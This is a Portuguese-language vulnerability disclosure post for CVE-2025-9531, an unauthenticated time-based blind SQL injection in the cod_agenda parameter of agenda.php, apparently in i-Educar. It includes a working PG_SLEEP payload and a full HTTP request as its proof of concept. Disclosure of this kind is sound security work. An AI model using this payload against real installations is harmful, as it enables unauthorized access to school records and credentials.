Featured image of post CVE-2025-9531

CVE-2025-9531

Injeção SQL

CVE-2025-9531: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro cod_agenda do Endpoint agenda.php

Publicação CVE: https://www.cve.org/CVERecord?id=CVE-2025-9531

Resumo

Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro cod_agenda do endpoint agenda.php. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.

Detalhes

O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro cod_agenda. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.

PoC

Endpoint Vulnerável: agenda.php

Parâmetro: cod_agenda

Payload:

1
' AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND 'xiCO'='xiCO

Exemplo de Requisição

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO  HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV
Connection: keep-alive

Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.

Requisição normal:

Requisição modificada:

Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.

Impacto

  • Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).
  • Enumeração de banco de dados (esquemas, tabelas, usuários, versões).
  • Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).
  • Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.
  • Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.

Referência

https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md

Encontrado por

Karina Gante

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy